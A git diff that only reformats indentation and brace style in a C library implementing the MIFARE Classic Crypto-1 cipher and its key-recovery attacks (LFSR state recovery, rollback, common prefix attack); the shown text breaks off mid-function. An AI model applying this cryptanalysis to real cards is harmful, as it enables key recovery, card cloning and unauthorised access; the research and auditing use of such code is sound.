diff --git a/src/crapto1.c b/src/crapto1.c index 9fc1e5f..b693bc3 100644 --- a/src/crapto1.c +++ b/src/crapto1.c @@ -24,50 +24,50 @@ static uint8_t filterlut[1 << 20]; static void __attribute__((constructor)) fill_lut(void) { - uint32_t i; - for(i = 0; i < 1 << 20; ++i) - filterlut[i] = filter(i); + uint32_t i; + for (i = 0; i < 1 << 20; ++i) + filterlut[i] = filter(i); } #define filter(x) (filterlut[(x) & 0xfffff]) #endif -static void quicksort(uint32_t* const start, uint32_t* const stop) +static void quicksort(uint32_t *const start, uint32_t *const stop) { - uint32_t *it = start + 1, *rit = stop; + uint32_t *it = start + 1, *rit = stop; - if(it > rit) - return; + if (it > rit) + return; - while(it < rit) - if(*it <= *start) - ++it; - else if(*rit > *start) - --rit; - else - *it ^= (*it ^= *rit, *rit ^= *it); + while (it < rit) + if (*it <= *start) + ++it; + else if (*rit > *start) + --rit; + else + *it ^= (*it ^= *rit, *rit ^= *it); - if(*rit >= *start) - --rit; - if(rit != start) - *rit ^= (*rit ^= *start, *start ^= *rit); + if (*rit >= *start) + --rit; + if (rit != start) + *rit ^= (*rit ^= *start, *start ^= *rit); - quicksort(start, rit - 1); - quicksort(rit + 1, stop); + quicksort(start, rit - 1); + quicksort(rit + 1, stop); } /** binsearch * Binary search for the first occurence of *stop's MSB in sorted [start,stop] */ -static inline uint32_t* +static inline uint32_t * binsearch(uint32_t *start, uint32_t *stop) { - uint32_t mid, val = *stop & 0xff000000; - while(start != stop) - if(start[mid = (stop - start) >> 1] > val) - stop = &start[mid]; - else - start += mid + 1; + uint32_t mid, val = *stop & 0xff000000; + while (start != stop) + if (start[mid = (stop - start) >> 1] > val) + stop = &start[mid]; + else + start += mid + 1; - return start; + return start; } /** update_contribution @@ -76,11 +76,11 @@ binsearch(uint32_t *start, uint32_t *stop) static inline void update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2) { - uint32_t p = *item >> 25; + uint32_t p = *item >> 25; - p = p << 1 | parity(*item & mask1); - p = p << 1 | parity(*item & mask2); - *item = p << 24 | (*item & 0xffffff); + p = p << 1 | parity(*item & mask1); + p = p << 1 | parity(*item & mask2); + *item = p << 24 | (*item & 0xffffff); } /** extend_table @@ -89,21 +89,21 @@ update_contribution(uint32_t *item, const uint32_t mask1, const uint32_t mask2) static inline void extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in) { - in <<= 24; - for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1) - if(filter(*tbl) ^ filter(*tbl | 1)) { - *tbl |= filter(*tbl) ^ bit; - update_contribution(tbl, m1, m2); - *tbl ^= in; - } else if(filter(*tbl) == bit) { - *++*end = tbl[1]; - tbl[1] = tbl[0] | 1; - update_contribution(tbl, m1, m2); - *tbl++ ^= in; - update_contribution(tbl, m1, m2); - *tbl ^= in; - } else - *tbl-- = *(*end)--; + in <<= 24; + for (*tbl <<= 1; tbl <= *end; *++tbl <<= 1) + if (filter(*tbl) ^ filter(*tbl | 1)) { + *tbl |= filter(*tbl) ^ bit; + update_contribution(tbl, m1, m2); + *tbl ^= in; + } else if (filter(*tbl) == bit) { + *++*end = tbl[1]; + tbl[1] = tbl[0] | 1; + update_contribution(tbl, m1, m2); + *tbl++ ^= in; + update_contribution(tbl, m1, m2); + *tbl ^= in; + } else + *tbl-- = *(*end)--; } /** extend_table_simple * using a bit of the keystream extend the table of possible lfsr states @@ -111,201 +111,202 @@ extend_table(uint32_t *tbl, uint32_t **end, int bit, int m1, int m2, uint32_t in static inline void extend_table_simple(uint32_t *tbl, uint32_t **end, int bit) { - for(*tbl <<= 1; tbl <= *end; *++tbl <<= 1) - if(filter(*tbl) ^ filter(*tbl | 1)) { - *tbl |= filter(*tbl) ^ bit; - } else if(filter(*tbl) == bit) { - *++*end = *++tbl; - *tbl = tbl[-1] | 1; - } else - *tbl-- = *(*end)--; + for (*tbl <<= 1; tbl <= *end; *++tbl <<= 1) + if (filter(*tbl) ^ filter(*tbl | 1)) { + *tbl |= filter(*tbl) ^ bit; + } else if (filter(*tbl) == bit) { + *++*end = *++tbl; + *tbl = tbl[-1] | 1; + } else + *tbl-- = *(*end)--; } /** recover * recursively narrow down the search space, 4 bits of keystream at a time */ -static struct Crypto1State* +static struct Crypto1State * recover(uint32_t *o_head, uint32_t *o_tail, uint32_t oks, - uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem, - struct Crypto1State *sl, uint32_t in) -{ - uint32_t *o, *e, i; + uint32_t *e_head, uint32_t *e_tail, uint32_t eks, int rem, + struct Crypto1State *sl, uint32_t in) { + uint32_t *o, *e, i; - if(rem == -1) { - for(e = e_head; e <= e_tail; ++e) { - *e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4); - for(o = o_head; o <= o_tail; ++o, ++sl) { - sl->even = *o; - sl->odd = *e ^ parity(*o & LF_POLY_ODD); - sl[1].odd = sl[1].even = 0; - } - } - return sl; - } + if (rem == -1) { + for (e = e_head; e <= e_tail; ++e) { + *e = *e << 1 ^ parity(*e & LF_POLY_EVEN) ^ !!(in & 4); + for (o = o_head; o <= o_tail; ++o, ++sl) { + sl->even = *o; + sl->odd = *e ^ parity(*o & LF_POLY_ODD); + sl[1].odd = sl[1].even = 0; + } + } + return sl; + } - for(i = 0; i < 4 && rem--; i++) { - extend_table(o_head, &o_tail, (oks >>= 1) & 1, - LF_POLY_EVEN << 1 | 1, LF_POLY_ODD << 1, 0); - if(o_head > o_tail) - return sl; + for (i = 0; i < 4 && rem--; i++) { + extend_table(o_head, &o_tail, (oks >>= 1) & 1, + LF_POLY_EVEN << 1 | 1, LF_POLY_ODD << 1, 0); + if (o_head > o_tail) + return sl; - extend_table(e_head, &e_tail, (eks >>= 1) & 1, - LF_POLY_ODD, LF_POLY_EVEN << 1 | 1, (in >>= 2) & 3); - if(e_head > e_tail) - return sl; - } + extend_table(e_head, &e_tail, (eks >>= 1) & 1, + LF_POLY_ODD, LF_POLY_EVEN << 1 | 1, (in >>= 2) & 3); + if (e_head > e_tail) + return sl; + } - quicksort(o_head, o_tail); - quicksort(e_head, e_tail); + quicksort(o_head, o_tail); + quicksort(e_head, e_tail); - while(o_tail >= o_head && e_tail >= e_head) - if(((*o_tail ^ *e_tail) >> 24) == 0) { - o_tail = binsearch(o_head, o = o_tail); - e_tail = binsearch(e_head, e = e_tail); - sl = recover(o_tail--, o, oks, - e_tail--, e, eks, rem, sl, in); - } - else if(*o_tail > *e_tail) - o_tail = binsearch(o_head, o_tail) - 1; - else - e_tail = binsearch(e_head, e_tail) - 1; + while (o_tail >= o_head && e_tail >= e_head) + if (((*o_tail ^ *e_tail) >> 24) == 0) { + o_tail = binsearch(o_head, o = o_tail); + e_tail = binsearch(e_head, e = e_tail); + sl = recover(o_tail--, o, oks, + e_tail--, e, eks, rem, sl, in); + } else if (*o_tail > *e_tail) + o_tail = binsearch(o_head, o_tail) - 1; + else + e_tail = binsearch(e_head, e_tail) - 1; - return sl; + return sl; } /** lfsr_recovery * recover the state of the lfsr given 32 bits of the keystream * additionally you can use the in parameter to specify the value * that was fed into the lfsr at the time the keystream was generated */ -struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in) -{ - struct Crypto1State *statelist; - uint32_t *odd_head = 0, *odd_tail = 0, oks = 0; - uint32_t *even_head = 0, *even_tail = 0, eks = 0; - int i; +struct Crypto1State *lfsr_recovery32(uint32_t ks2, uint32_t in) { + struct Crypto1State *statelist; + uint32_t *odd_head = 0, *odd_tail = 0, oks = 0; + uint32_t *even_head = 0, *even_tail = 0, eks = 0; + int i; - for(i = 31; i >= 0; i -= 2) - oks = oks << 1 | BEBIT(ks2, i); - for(i = 30; i >= 0; i -= 2) - eks = eks << 1 | BEBIT(ks2, i); + for (i = 31; i >= 0; i -= 2) + oks = oks << 1 | BEBIT(ks2, i); + for (i = 30; i >= 0; i -= 2) + eks = eks << 1 | BEBIT(ks2, i); - odd_head = odd_tail = malloc(sizeof(uint32_t) << 21); - even_head = even_tail = malloc(sizeof(uint32_t) << 21); - statelist = malloc(sizeof(struct Crypto1State) << 18); - if(!odd_tail-- || !even_tail-- || !statelist) - goto out; + odd_head = odd_tail = malloc(sizeof(uint32_t) << 21); + even_head = even_tail = malloc(sizeof(uint32_t) << 21); + statelist = malloc(sizeof(struct Crypto1State) << 18); + if (!odd_tail-- || !even_tail-- || !statelist) + goto out; - statelist->odd = statelist->even = 0; + statelist->odd = statelist->even = 0; - for(i = 1 << 20; i >= 0; --i) { - if(filter(i) == (oks & 1)) - *++odd_tail = i; - if(filter(i) == (eks & 1)) - *++even_tail = i; - } + for (i = 1 << 20; i >= 0; --i) { + if (filter(i) == (oks & 1)) + *++odd_tail = i; + if (filter(i) == (eks & 1)) + *++even_tail = i; + } - for(i = 0; i < 4; i++) { - extend_table_simple(odd_head, &odd_tail, (oks >>= 1) & 1); - extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1); - } + for (i = 0; i < 4; i++) { + extend_table_simple(odd_head, &odd_tail, (oks >>= 1) & 1); + extend_table_simple(even_head, &even_tail, (eks >>= 1) & 1); + } - in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00); - recover(odd_head, odd_tail, oks, - even_head, even_tail, eks, 11, statelist, in << 1); + in = (in >> 16 & 0xff) | (in << 16) | (in & 0xff00); + recover(odd_head, odd_tail, oks, + even_head, even_tail, eks, 11, statelist, in << 1); out: - free(odd_head); - free(even_head); - return statelist; + free(odd_head); + free(even_head); + return statelist; } static const uint32_t S1[] = { 0x62141, 0x310A0, 0x18850, 0x0C428, 0x06214, - 0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83, - 0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA}; + 0x0310A, 0x85E30, 0xC69AD, 0x634D6, 0xB5CDE, 0xDE8DA, 0x6F46D, 0xB3C83, + 0x59E41, 0xA8995, 0xD027F, 0x6813F, 0x3409F, 0x9E6FA + }; static const uint32_t S2[] = { 0x3A557B00, 0x5D2ABD80, 0x2E955EC0, 0x174AAF60, - 0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8, - 0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20, - 0x7EC7EE90, 0x7F63F748, 0x79117020}; + 0x0BA557B0, 0x05D2ABD8, 0x0449DE68, 0x048464B0, 0x42423258, 0x278192A8, + 0x156042D0, 0x0AB02168, 0x43F89B30, 0x61FC4D98, 0x765EAD48, 0x7D8FDD20, + 0x7EC7EE90, 0x7F63F748, 0x79117020 + }; static const uint32_t T1[] = { - 0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66, - 0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B, - 0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615, - 0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C}; + 0x4F37D, 0x279BE, 0x97A6A, 0x4BD35, 0x25E9A, 0x12F4D, 0x097A6, 0x80D66, + 0xC4006, 0x62003, 0xB56B4, 0x5AB5A, 0xA9318, 0xD0F39, 0x6879C, 0xB057B, + 0x582BD, 0x2C15E, 0x160AF, 0x8F6E2, 0xC3DC4, 0xE5857, 0x72C2B, 0x39615, + 0x98DBF, 0xC806A, 0xE0680, 0x70340, 0x381A0, 0x98665, 0x4C332, 0xA272C +}; static const uint32_t T2[] = { 0x3C88B810, 0x5E445C08, 0x2982A580, 0x14C152C0, - 0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268, - 0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0, - 0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0, - 0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950, - 0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0}; + 0x4A60A960, 0x253054B0, 0x52982A58, 0x2FEC9EA8, 0x1156C4D0, 0x08AB6268, + 0x42F53AB0, 0x217A9D58, 0x161DC528, 0x0DAE6910, 0x46D73488, 0x25CB11C0, + 0x52E588E0, 0x6972C470, 0x34B96238, 0x5CFC3A98, 0x28DE96C8, 0x12CFC0E0, + 0x4967E070, 0x64B3F038, 0x74F97398, 0x7CDC3248, 0x38CE92A0, 0x1C674950, + 0x0E33A4A8, 0x01B959D0, 0x40DCACE8, 0x26CEDDF0 + }; static const uint32_t C1[] = { 0x846B5, 0x4235A, 0x211AD}; static const uint32_t C2[] = { 0x1A822E0, 0x21A822E0, 0x21A822E0}; /** Reverse 64 bits of keystream into possible cipher states * Variation mentioned in the paper. Somewhat optimized version */ -struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3) -{ - struct Crypto1State *statelist, *sl; - uint8_t oks[32], eks[32], hi[32]; - uint32_t low = 0, win = 0; - uint32_t *tail, table[1 << 16]; - int i, j; +struct Crypto1State *lfsr_recovery64(uint32_t ks2, uint32_t ks3) { + struct Crypto1State *statelist, *sl; + uint8_t oks[32], eks[32], hi[32]; + uint32_t low = 0, win = 0; + uint32_t *tail, table[1 << 16]; + int i, j; - sl = statelist = malloc(sizeof(struct Crypto1State) << 4); - if(!sl) - return 0; - sl->odd = sl->even = 0; + sl = statelist = malloc(sizeof(struct Crypto1State) << 4); + if (!sl) + return 0; + sl->odd = sl->even = 0; - for(i = 30; i >= 0; i -= 2) { - oks[i >> 1] = BIT(ks2, i ^ 24); - oks[16 + (i >> 1)] = BIT(ks3, i ^ 24); - } - for(i = 31; i >= 0; i -= 2) { - eks[i >> 1] = BIT(ks2, i ^ 24); - eks[16 + (i >> 1)] = BIT(ks3, i ^ 24); - } + for (i = 30; i >= 0; i -= 2) { + oks[i >> 1] = BIT(ks2, i ^ 24); + oks[16 + (i >> 1)] = BIT(ks3, i ^ 24); + } + for (i = 31; i >= 0; i -= 2) { + eks[i >> 1] = BIT(ks2, i ^ 24); + eks[16 + (i >> 1)] = BIT(ks3, i ^ 24); + } - for(i = 0xfffff; i >= 0; --i) { - if (filter(i) != oks[0]) - continue; + for (i = 0xfffff; i >= 0; --i) { + if (filter(i) != oks[0]) + continue; - *(tail = table) = i; - for(j = 1; tail >= table && j < 29; ++j) - extend_table_simple(table, &tail, oks[j]); + *(tail = table) = i; + for (j = 1; tail >= table && j < 29; ++j) + extend_table_simple(table, &tail, oks[j]); - if(tail < table) - continue; + if (tail < table) + continue; - for(j = 0; j < 19; ++j) - low = low << 1 | parity(i & S1[j]); - for(j = 0; j < 32; ++j) - hi[j] = parity(i & T1[j]); + for (j = 0; j < 19; ++j) + low = low << 1 | parity(i & S1[j]); + for (j = 0; j < 32; ++j) + hi[j] = parity(i & T1[j]); - for(; tail >= table; --tail) { - for(j = 0; j < 3; ++j) { - *tail = *tail << 1; - *tail |= parity((i & C1[j]) ^ (*tail & C2[j])); - if(filter(*tail) != oks[29 + j]) - goto continue2; - } + for (; tail >= table; --tail) { + for (j = 0; j < 3; ++j) { + *tail = *tail << 1; + *tail |= parity((i & C1[j]) ^(*tail & C2[j])); + if (filter(*tail) != oks[29 + j]) + goto continue2; + } - for(j = 0; j < 19; ++j) - win = win << 1 | parity(*tail & S2[j]); + for (j = 0; j < 19; ++j) + win = win << 1 | parity(*tail & S2[j]); - win ^= low; - for(j = 0; j < 32; ++j) { - win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]); - if(filter(win) != eks[j]) - goto continue2; - } + win ^= low; + for (j = 0; j < 32; ++j) { + win = win << 1 ^ hi[j] ^ parity(*tail & T2[j]); + if (filter(win) != eks[j]) + goto continue2; + } - *tail = *tail << 1 | parity(LF_POLY_EVEN & *tail); - sl->odd = *tail ^ parity(LF_POLY_ODD & win); - sl->even = win; - ++sl; - sl->odd = sl->even = 0; - continue2:; - } - } - return statelist; + *tail = *tail << 1 | parity(LF_POLY_EVEN & *tail); + sl->odd = *tail ^ parity(LF_POLY_ODD & win); + sl->even = win; + ++sl; + sl->odd = sl->even = 0; +continue2: + ; + } + } + return statelist; } uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb); @@ -318,42 +319,42 @@ uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd); */ uint8_t lfsr_rollback_bit(struct Crypto1State *s, uint32_t in, int fb) { - int out; - uint8_t ret; + int out; + uint8_t ret; - s->odd &= 0xffffff; - s->odd ^= (s->odd ^= s->even, s->even ^= s->odd); + s->odd &= 0xffffff; + s->odd ^= (s->odd ^= s->even, s->even ^= s->odd); - out = s->even & 1; - out ^= LF_POLY_EVEN & (s->even >>= 1); - out ^= LF_POLY_ODD & s->odd; - out ^= !!in; - out ^= (ret = filter(s->odd)) & !!fb; + out = s->even & 1; + out ^= LF_POLY_EVEN & (s->even >>= 1); + out ^= LF_POLY_ODD & s->odd; + out ^= !!in; + out ^= (ret = filter(s->odd)) & !!fb; - s->even |= parity(out) << 23; - return ret; + s->even |= parity(out) << 23; + return ret; } /** lfsr_rollback_byte * Rollback the shift register in order to get previous states */ uint8_t lfsr_rollback_byte(struct Crypto1State *s, uint32_t in, int fb) { - int i; - uint8_t ret = 0; - for (i = 7; i >= 0; --i) - ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i; - return ret; + int i; + uint8_t ret = 0; + for (i = 7; i >= 0; --i) + ret |= lfsr_rollback_bit(s, BIT(in, i), fb) << i; + return ret; } /** lfsr_rollback_word * Rollback the shift register in order to get previous states */ uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb) { - int i; - uint32_t ret = 0; - for (i = 31; i >= 0; --i) - ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24); - return ret; + int i; + uint32_t ret = 0; + for (i = 31; i >= 0; --i) + ret |= lfsr_rollback_bit(s, BEBIT(in, i), fb) << (i ^ 24); + return ret; } /** nonce_distance @@ -362,23 +363,24 @@ uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb) static uint16_t *dist = 0; int nonce_distance(uint32_t from, uint32_t to) { - uint16_t x, i; - if(!dist) { - dist = malloc(2 << 16); - if(!dist) - return -1; - for (x = i = 1; i; ++i) { - dist[(x & 0xff) << 8 | x >> 8] = i; - x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15; - } - } - return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535; + uint16_t x, i; + if (!dist) { + dist = malloc(2 << 16); + if (!dist) + return -1; + for (x = i = 1; i; ++i) { + dist[(x & 0xff) << 8 | x >> 8] = i; + x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15; + } + } + return (65535 + dist[to >> 16] - dist[from >> 16]) % 65535; } static uint32_t fastfwd[2][8] = { - { 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB}, - { 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980}}; + { 0, 0x4BC53, 0xECB1, 0x450E2, 0x25E29, 0x6E27A, 0x2B298, 0x60ECB}, + { 0, 0x1D962, 0x4BC53, 0x56531, 0xECB1, 0x135D3, 0x450E2, 0x58980} +}; /** lfsr_prefix_ks @@ -392,64 +394,63 @@ static uint32_t fastfwd[2][8] = { */ uint32_t *lfsr_prefix_ks(uint8_t ks[8], int isodd) { - uint32_t c, entry, *candidates = malloc(4 << 21); - int i, size = (1 << 21) - 1; + uint32_t c, entry, *candidates = malloc(4 << 21); + int i, size = (1 << 21) - 1; - if(!candidates) - return 0; + if (!candidates) + return 0; - for(i = 0; i <= size; ++i) - candidates[i] = i; + for (i = 0; i <= size; ++i) + candidates[i] = i; - for(c = 0; c < 8; ++c) - for(i = 0;i <= size; ++i) { - entry = candidates[i] ^ fastfwd[isodd][c]; + for (c = 0; c < 8; ++c) + for (i = 0; i <= size; ++i) { + entry = candidates[i] ^ fastfwd[isodd][c]; - if(filter(entry >> 1) != BIT(ks[c], isodd) || - filter(entry) != BIT(ks[c], isodd + 2)) - candidates[i--] = candidates[size--]; - } + if (filter(entry >> 1) != BIT(ks[c], isodd) || + filter(entry) != BIT(ks[c], isodd + 2)) + candidates[i--] = candidates[size--]; + } - candidates[size + 1] = -1; + candidates[size + 1] = -1; - return candidates; + return candidates; } /** check_pfx_parity * helper function which eliminates possible secret states using parity bits */ -static struct Crypto1State* +static struct Crypto1State * check_pfx_parity(uint32_t prefix, uint32_t rresp, uint8_t parities[8][8], - uint32_t odd, uint32_t even, struct Crypto1State* sl) -{ - uint32_t ks1, nr, ks2, rr, ks3, c, good = 1; + uint32_t odd, uint32_t even, struct Crypto1State *sl) { + uint32_t ks1, nr, ks2, rr, ks3, c, good = 1; - for(c = 0; good && c < 8; ++c) { - sl->odd = odd ^ fastfwd[1][c]; - sl->even = even ^ fastfwd[0][c]; + for (c = 0; good && c < 8; ++c) { + sl->odd = odd ^ fastfwd[1][c]; + sl->even = even ^ fastfwd[0][c]; - lfsr_rollback_bit(sl, 0, 0); - lfsr_rollback_bit(sl, 0, 0); + lfsr_rollback_bit(sl, 0, 0); + lfsr_rollback_bit(sl, 0, 0); - ks3 = lfsr_rollback_bit(sl, 0, 0); - ks2 = lfsr_rollback_word(sl, 0, 0); - ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1); + ks3 = lfsr_rollback_bit(sl, 0, 0); + ks2 = lfsr_rollback_word(sl, 0, 0); + ks1 = lfsr_rollback_word(sl, prefix | c << 5, 1); - nr = ks1 ^ (prefix | c << 5); - rr = ks2 ^ rresp; + nr = ks1 ^(prefix | c << 5); + rr = ks2 ^ rresp; - good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24); - good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16); - good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2, 8); - good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2, 0); - good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3; - } + good &= parity(nr & 0x000000ff) ^ parities[c][3] ^ BIT(ks2, 24); + good &= parity(rr & 0xff000000) ^ parities[c][4] ^ BIT(ks2, 16); + good &= parity(rr & 0x00ff0000) ^ parities[c][5] ^ BIT(ks2, 8); + good &= parity(rr & 0x0000ff00) ^ parities[c][6] ^ BIT(ks2, 0); + good &= parity(rr & 0x000000ff) ^ parities[c][7] ^ ks3; + } - return sl + good; -} + return sl + good; +} -struct Crypto1State* lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]); +struct Crypto1State *lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]); /** lfsr_common_prefix * Implentation of the common prefix attack. @@ -460,35 +461,34 @@ struct Crypto1State* lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8] * It returns a zero terminated list of possible cipher states after the * tag nonce was fed in */ -struct Crypto1State* -lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]) -{ - struct Crypto1State *statelist, *s; - uint32_t *odd, *even, *o, *e, top; +struct Crypto1State * +lfsr_common_prefix(uint32_t pfx, uint32_t rr, uint8_t ks[8], uint8_t par[8][8]) { + struct Crypto1State *statelist, *s; + uint32_t *odd, *even, *o, *e, top; - odd = lfsr_prefix_ks(ks, 1); - even = lfsr_prefix_ks(ks, 0); + odd = lfsr_prefix_ks(ks, 1); + even = lfsr_prefix_ks(ks, 0); - s = statelist = malloc((sizeof *statelist) << 20); - if(!s || !odd || !even) { - free(odd); - free(even); - free(statelist); - return 0; - } + s = statelist = malloc((sizeof *statelist) << 20); + if (!s || !odd || !even) { + free(odd); + free(even); + free(statelist); + return 0; + } - for(o = odd; *o + 1; ++o) - for(e = even; *e + 1; ++e) - for(top = 0; top < 64; ++top) { - *o += 1 << 21; - *e += (!(top & 7) + 1) << 21; - s = check_pfx_parity(pfx, rr, par, *o, *e, s); - } + for (o = odd; *o + 1; ++o) + for (e = even; *e + 1; ++e) + for (top = 0; top < 64; ++top) { + *o += 1 << 21; + *e += (!(top & 7) + 1) << 21; + s = check_pfx_parity(pfx, rr, par, *o, *e, s); + } - s->odd = s->even = 0; + s->odd = s->even = 0; - free(odd); - free(even); + free(odd); + free(even); - return statelist; + return statelist; } diff --git a/src/crapto1.h b/src/crapto1.h index 5763861..792be8c 100644 --- a/src/crapto1.h +++ b/src/crapto1.h @@ -24,65 +24,65 @@ extern "C" { #endif -struct Crypto1State {uint32_t odd, even;}; -struct Crypto1State* crypto1_create(uint64_t); -void crypto1_destroy(struct Crypto1State*); -void crypto1_get_lfsr(struct Crypto1State*, uint64_t*); -uint8_t crypto1_bit(struct Crypto1State*, uint8_t, int); -uint8_t crypto1_byte(struct Crypto1State*, uint8_t, int); -uint32_t crypto1_word(struct Crypto1State*, uint32_t, int); -uint32_t prng_successor(uint32_t x, uint32_t n); + struct Crypto1State {uint32_t odd, even;}; + struct Crypto1State *crypto1_create(uint64_t); + void crypto1_destroy(struct Crypto1State *); + void crypto1_get_lfsr(struct Crypto1State *, uint64_t *); + uint8_t crypto1_bit(struct Crypto1State *, uint8_t, int); + uint8_t crypto1_byte(struct Crypto1State *, uint8_t, int); + uint32_t crypto1_word(struct Crypto1State *, uint32_t, int); + uint32_t prng_successor(uint32_t x, uint32_t n); -struct Crypto1State* lfsr_recovery32(uint32_t ks2, uint32_t in); -struct Crypto1State* lfsr_recovery64(uint32_t ks2, uint32_t ks3); + struct Crypto1State *lfsr_recovery32(uint32_t ks2, uint32_t in); + struct Crypto1State *lfsr_recovery64(uint32_t ks2, uint32_t ks3); -void lfsr_rollback(struct Crypto1State* s, uint32_t in, int fb); -uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb); -int nonce_distance(uint32_t from, uint32_t to); + void lfsr_rollback(struct Crypto1State *s, uint32_t in, int fb); + uint32_t lfsr_rollback_word(struct Crypto1State *s, uint32_t in, int fb); + int nonce_distance(uint32_t from, uint32_t to); #define FOREACH_VALID_NONCE(N, FILTER, FSIZE)\ - uint32_t __n = 0,__M = 0, N = 0;\ - int __i;\ - for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\ - for(__i = FSIZE - 1; __i >= 0; __i--)\ - if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\ - break;\ - else if(__i)\ - __M = prng_successor(__M, (__i == 7) ? 48 : 8);\ - else + uint32_t __n = 0,__M = 0, N = 0;\ + int __i;\ + for(; __n < 1 << 16; N = prng_successor(__M = ++__n, 16))\ + for(__i = FSIZE - 1; __i >= 0; __i--)\ + if(BIT(FILTER, __i) ^ parity(__M & 0xFF01))\ + break;\ + else if(__i)\ + __M = prng_successor(__M, (__i == 7) ? 48 : 8);\ + else #define LF_POLY_ODD (0x29CE5C) #define LF_POLY_EVEN (0x870804) #define BIT(x, n) ((x) >> (n) & 1) #define BEBIT(x, n) BIT(x, (n) ^ 24) -static inline int parity(uint32_t x) -{ + static inline int parity(uint32_t x) + { #if !defined __i386__ || !defined __GNUC__ - x ^= x >> 16; - x ^= x >> 8; - x ^= x >> 4; - return BIT(0x6996, x & 0xf); + x ^= x >> 16; + x ^= x >> 8; + x ^= x >> 4; + return BIT(0x6996, x & 0xf); #else - asm( "movl %1, %%eax\n" - "mov %%ax, %%cx\n" - "shrl $0x10, %%eax\n" - "xor %%ax, %%cx\n" - "xor %%ch, %%cl\n" - "setpo %%al\n" - "movzx %%al, %0\n": "=r"(x) : "r"(x): "eax","ecx"); - return x; + asm("movl %1, %%eax\n" + "mov %%ax, %%cx\n" + "shrl $0x10, %%eax\n" + "xor %%ax, %%cx\n" + "xor %%ch, %%cl\n" + "setpo %%al\n" + "movzx %%al, %0\n": "=r"(x) : "r"(x): "eax", "ecx"); + return x; #endif -} -static inline int filter(uint32_t const x) -{ - uint32_t f; + } + static inline int filter(uint32_t const x) + { + uint32_t f; - f = 0xf22c0 >> (x & 0xf) & 16; - f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8; - f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4; - f |= 0x1e458 >> (x >> 12 & 0xf) & 2; - f |= 0x0d938 >> (x >> 16 & 0xf) & 1; - return BIT(0xEC57E80A, f); -} + f = 0xf22c0 >> (x & 0xf) & 16; + f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8; + f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4; + f |= 0x1e458 >> (x >> 12 & 0xf) & 2; + f |= 0x0d938 >> (x >> 16 & 0xf) & 1; + return BIT(0xEC57E80A, f); + } #ifdef __cplusplus } #endif diff --git a/src/crypto1.c b/src/crypto1.c index e2aab71..fc11f00 100644 --- a/src/crypto1.c +++ b/src/crypto1.c @@ -21,63 +21,62 @@ #include #define SWAPENDIAN(x)\ - (x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16) + (x = (x >> 8 & 0xff00ff) | (x & 0xff00ff) << 8, x = x >> 16 | x << 16) -struct Crypto1State * crypto1_create(uint64_t key) -{ - struct Crypto1State *s = malloc(sizeof(*s)); - int i; +struct Crypto1State *crypto1_create(uint64_t key) { + struct Crypto1State *s = malloc(sizeof(*s)); + int i; - for(i = 47;s && i > 0; 